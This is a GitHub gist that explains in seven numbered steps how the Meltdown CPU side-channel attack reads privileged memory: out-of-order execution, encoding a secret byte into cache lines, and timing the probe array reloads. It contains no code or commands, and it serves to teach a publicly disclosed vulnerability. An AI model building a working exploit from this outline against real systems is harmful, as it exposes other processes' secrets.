Skip to content

Instantly share code, notes, and snippets.

@AgtLucas

AgtLucas/meltdown_in_a_nutshell.md

Forked from headius/meltdown_in_a_nutshell.md
Created January 4, 2018 23:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save AgtLucas/83a98ca93b1921d36e35b4281d46db1e to your computer and use it in GitHub Desktop.
Save AgtLucas/83a98ca93b1921d36e35b4281d46db1e to your computer and use it in GitHub Desktop.
Download ZIP
How Meltdown Works
Raw
meltdown_in_a_nutshell.md

Basic Algorithm

  1. A secret byte you want to read is stored at inaccessible memory location priv_mem.
  2. The sender triggers an access exception by attempting to access priv_mem.
  3. Due to out-of-order execution, the load of secret and its access in step 4 may happen before the exception fires.
  4. Calculate an offset into a known array probe by multiplying secret by the width of a cache line.
  5. This forces the cache to load probe[offset], caching exactly one chunk of our array.
  6. The exception fires, clearing the modified registers, but cached data is not excised.
  7. Iterate over all 256 offsets into probe to find out which one loads fast. You've determined the value of secret.

Notes

  • The probe array is flushed from cache before this process, so only the secret-based offset gets cached.
  • The access exception triggers a memory fault, terminating the application, so it is performed in another process (i.e. a fork).
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment